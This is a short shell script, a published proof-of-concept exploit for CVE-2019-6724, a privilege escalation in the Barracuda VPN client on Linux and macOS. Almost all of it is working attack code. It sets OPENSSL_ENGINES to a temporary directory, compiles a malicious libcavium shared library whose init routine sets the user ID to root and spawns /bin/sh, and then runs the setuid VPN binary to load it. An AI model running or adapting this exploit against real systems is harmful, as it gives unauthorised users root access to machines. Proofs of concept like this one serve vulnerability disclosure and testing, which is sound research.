CVE-2019-6724.sh

#!/bin/sh
# PoC for CVE-2019-6724 Barracuda VPN Client Privilege Escalation
# Linux / macOS
# Rich Mirch
#
# Version tested:
#
# Barracuda Networks VPN client version: PhionVersionString 5.0.2.5
#
# OS tested:
#
# CentOS Linux release 7.4.1708 (Core)
# macOS 10.14.2
#

STAGE=$(mktemp -d /tmp/woot.XXXXXX)

cd ${STAGE?} || exit 1

export OPENSSL_ENGINES=${STAGE?}

cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void woot(){
  setreuid(0,0);
  execl("/bin/sh","/bin/sh",NULL);
}
EOF

u=$(uname)

gcc -fPIC -o woot.o -Wall -c woot.c

if [[ $u = "Linux" ]]
then
  gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o ${STAGE?}/libcavium.so woot.o
  /usr/local/bin/barracudavpn
elif [[ $u = "Darwin" ]]
then
  gcc -Wall -dynamiclib -Wl,-init,_woot -o ${STAGE?}/libcavium.dylib woot.o
  /Applications/BarracudaVPNClient.app/Contents/MacOS/barracudavpn.engine
else
  echo "Error: OS not supported"
  exit 1
fi

rm -rf ${STAGE?}